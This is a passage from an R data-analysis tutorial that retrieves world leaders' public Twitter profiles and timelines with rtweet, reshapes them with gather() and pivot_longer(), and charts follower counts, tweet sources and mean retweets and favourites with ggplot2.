&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 10 x 20&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## user_id name screen_name location description url protected&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;lgl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 25073877 Donal… realDonaldT… Washing… 45th President o… http… FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 5007043… Pope … Pontifex Vatican… Welcome to the o… http… FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 18839785 Naren… narendramodi India Prime Minister o… http… FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 4717417… PMO I… PMOIndia &amp;#34;India &amp;#34; Office of the Pr… http… FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 8222156… Presi… POTUS Washing… 45th President o… http… FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 8222156… The W… WhiteHouse Washing… Welcome to @Whit… http… FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 68034431 Recep… RT_Erdogan Ankara,… Türkiye Cumhurba… &amp;lt;NA&amp;gt; FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 8 2196174… Sushm… SushmaSwaraj New Del… Minister of Exte… &amp;lt;NA&amp;gt; FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 9 3669871… Joko … jokowi Jakarta Akun resmi Joko … &amp;lt;NA&amp;gt; FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 10 44335525 HH Sh… HHShkMohd Dubai, … Official Tweets … http… FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ... with 13 more variables: followers_count &amp;lt;int&amp;gt;, friends_count &amp;lt;int&amp;gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # listed_count &amp;lt;int&amp;gt;, statuses_count &amp;lt;int&amp;gt;, favourites_count &amp;lt;int&amp;gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # account_created_at &amp;lt;dttm&amp;gt;, verified &amp;lt;lgl&amp;gt;, profile_url &amp;lt;chr&amp;gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # profile_expanded_url &amp;lt;chr&amp;gt;, account_lang &amp;lt;chr&amp;gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # profile_banner_url &amp;lt;chr&amp;gt;, profile_background_url &amp;lt;chr&amp;gt;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # profile_image_url &amp;lt;chr&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We only want the columns of interest (name, screen_name, followers_count, friends_count, statuses_count and favourites_count) and then we want the data in long format. To do this we’re going to use &lt;code&gt;select()&lt;/code&gt; and &lt;code&gt;gather()&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;(lead_r_info &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; lead_r_info &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(name, followers_count, friends_count, statuses_count, favourites_count, screen_name) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;gather&lt;/span&gt;(type, value, &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;name, &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;screen_name))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 40 x 4&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## name screen_name type value&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 Donald J. Trump realDonaldTrump followers_count 48426576&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 Pope Francis Pontifex followers_count 16858642&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 Narendra Modi narendramodi followers_count 40710139&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 PMO India PMOIndia followers_count 25156203&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 President Trump POTUS followers_count 22324998&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 The White House WhiteHouse followers_count 16713369&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 Recep Tayyip Erdoğan RT_Erdogan followers_count 12513987&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 8 Sushma Swaraj SushmaSwaraj followers_count 11461412&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 9 Joko Widodo jokowi followers_count 9693534&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 10 HH Sheikh Mohammed HHShkMohd followers_count 8764455&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ... with 30 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now we can use the fantastic {ggplot2} to plot the respective counts for each world leader.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; lead_r_info,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reorder&lt;/span&gt;(name, value), y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value,fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; type, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; type)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_col&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;facet_wrap&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;type, scales &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;free&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; strip.background &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; strip.text &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axis.text.x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;coord_flip&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_text&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value, label &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value), colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;black&amp;#34;&lt;/span&gt;, hjust &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;inward&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="twitter-world-leader-overview.svg" style="width:550px; class:image-center"&gt;
&lt;p&gt;Notice Donald &lt;em&gt;trumps&lt;/em&gt; everyone in the followers and statuses panels (from what I hear he’s quite a prolific tweeter). However, Sushma Swaraj and Narendra Modi trump everyone when it comes to favourites and friends respectively.&lt;/p&gt;
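&lt;p&gt;As an aside on the reshaping step used before the plot, here is a small sketch of what &lt;code&gt;gather()&lt;/code&gt; does, using a toy table invented for illustration. It also shows &lt;code&gt;pivot_longer()&lt;/code&gt;, the newer equivalent in {tidyr} 1.0.0 and later, in case you prefer that interface. The two functions return the same values but may order the rows differently.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;tidyr&amp;#34;)

# Toy data, invented for illustration
toy = data.frame(
  name = c(&amp;#34;Leader A&amp;#34;, &amp;#34;Leader B&amp;#34;),
  followers_count = c(100, 200),
  friends_count = c(10, 20)
)

# gather(): every column except name becomes a (type, value) pair
long_gather = gather(toy, type, value, -name)

# pivot_longer(): the same reshaping with the newer interface
long_pivot = pivot_longer(toy, cols = -name,
                          names_to = &amp;#34;type&amp;#34;, values_to = &amp;#34;value&amp;#34;)

# 2 leaders x 2 count columns gives 4 rows either way
nrow(long_gather)
## [1] 4
nrow(long_pivot)
## [1] 4
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;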
&lt;p&gt;Now, we’re going to use the function &lt;code&gt;get_timelines()&lt;/code&gt; to retrieve the last 2000 tweets by each leader. Again this may take a while!&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;lead_r_tl &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_timelines&lt;/span&gt;(lead_r, n &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2000&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Unfortunately &lt;code&gt;get_timelines()&lt;/code&gt; only gives us their twitter handle and doesn’t return their actual name. So I’m going to use &lt;code&gt;distinct()&lt;/code&gt; and &lt;code&gt;left_join()&lt;/code&gt; to add the column of names, which makes for easier reading on the upcoming graphs. Because &lt;code&gt;lead_r_info&lt;/code&gt; is now in long format, with one row per leader and count type, &lt;code&gt;distinct()&lt;/code&gt; keeps a single name per handle so that the join does not duplicate tweets.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;names &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;distinct&lt;/span&gt;(lead_r_info, name, screen_name)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;lead_r_twitt &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;left_join&lt;/span&gt;(lead_r_tl, names, by &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;screen_name&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;code&gt;get_timelines()&lt;/code&gt; gives us the source of a person’s tweet, i.e. iPhone, iPad, Android etc. So, what is the most popular tweet source among world leaders?&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;lead_r_twitt &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;count&lt;/span&gt;(source) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reorder&lt;/span&gt;(source, n), y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; n)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_col&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;cornflowerblue&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; strip.background &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axis.text.x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Tweet sources for world leaders&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;coord_flip&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_text&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; n, label &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; n), hjust &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;inward&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="unnamed-chunk-11-1.svg" style="width:550px; class:image-center"&gt;
&lt;p&gt;Either world leaders really love iPhones or their social media / security teams do. Probably the latter. I can hear you all asking the question: which source is more likely to give a world leader more retweets and favourites? To answer this, we’re going to summarise each source by its mean number of retweets and favourites, and then gather the data into a long format for plotting.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;lead_r_twitt &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(source) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;summarise&lt;/span&gt;(Retweet &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(retweet_count), Favourite &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(favorite_count)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;gather&lt;/span&gt;(type,value,&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;source) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reorder&lt;/span&gt;(source, value), y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value, fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; type)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_col&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;facet_wrap&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;type, scales &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;free&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Source&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Which source is more likely to get more retweets and favourites?&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; subtitle &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Values are the mean in each group&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; legend.position &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;none&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axis.text.x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
